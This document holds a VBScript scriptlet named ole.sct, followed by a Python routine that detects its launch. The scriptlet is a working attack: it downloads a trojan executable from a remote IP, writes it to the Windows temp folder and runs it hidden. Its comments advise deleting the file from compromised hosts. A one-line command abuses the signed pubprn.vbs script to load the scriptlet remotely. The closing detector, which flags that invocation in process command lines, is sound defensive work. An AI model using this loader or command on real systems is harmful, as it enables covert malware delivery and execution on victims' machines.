ole.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="VBScript">
<![CDATA[
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
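' Uses the local WebDAV client to issue the HTTP request indirectly. This is the URL of your own trojan;
' in real operations, drop it straight onto a compromised host and remember to delete it promptly after use.
http.open "GET","http://192.168.3.29/ole.exe",False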
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\windows\temp\ole.exe" ' Path the file is saved to on the target machine
ado.Close
CreateObject("WScript.Shell").Run "c:\windows\temp\ole.exe",0,true ' Execute the trojan
]]>
</script>
</scriptlet>
Remotely load and execute your own trojan: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.3.29/ole.sct
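
A defender-side check for the invocation on the last line, as an added example that is not part of the original file: it flags process command lines in which pubprn.vbs receives a `script:` moniker in place of its usual LDAP container argument. The function names are hypothetical, and every sample command line except the first (taken from this page) is constructed.

```python
import re

# A script host (cscript/wscript) launching pubprn.vbs from any path or locale folder.
PUBPRN = re.compile(r'(?i)\b[cw]script(\.exe)?\b.*\bpubprn\.vbs\b')
# pubprn.vbs hands its second argument to GetObject(); a "script:" moniker there
# loads a scriptlet instead of binding to an LDAP container.
MONIKER = re.compile(r'(?i)\bscript:\s*(\S+)')
REMOTE = re.compile(r'(?i)(https?:)?//|\\\\')  # URL or UNC path

def classify(cmdline):
    """Return (verdict, scriptlet_location) for one process command line."""
    if not PUBPRN.search(cmdline):
        return ("ignore", None)
    m = MONIKER.search(cmdline)
    if not m:
        return ("benign-pubprn", None)
    loc = m.group(1).strip('"')
    verdict = "remote-scriptlet" if REMOTE.match(loc) else "local-scriptlet"
    return (verdict, loc)

# Constructed process-creation command lines; only the first is taken from this page.
SAMPLES = [
    r'cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs '
    r'127.0.0.1 script:http://192.168.3.29/ole.sct',
    r'cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs '
    r'PrintServer1 "LDAP://CN=MyContainer,DC=MyDomain,DC=Company,DC=Com"',
    r'"C:\Windows\System32\wscript.exe" '
    r'"C:\Windows\System32\Printing_Admin_Scripts\de-DE\pubprn.vbs" '
    r'localhost "script:\\fileserver\share\x.sct"',
    r'cscript //nologo C:\scripts\inventory.vbs',
]

def scan(cmdlines):
    """Return (verdict, location, cmdline) for every line that needs review."""
    hits = []
    for line in cmdlines:
        verdict, loc = classify(line)
        if verdict.endswith("scriptlet"):
            hits.append((verdict, loc, line))
    return hits

if __name__ == "__main__":
    for verdict, loc, line in scan(SAMPLES):
        print(f"[{verdict}] {loc}\n    {line}")
```

Matching on the script host name alone misses renamed copies of cscript.exe or pubprn.vbs, so pair this with file-hash or original-filename telemetry where it is available.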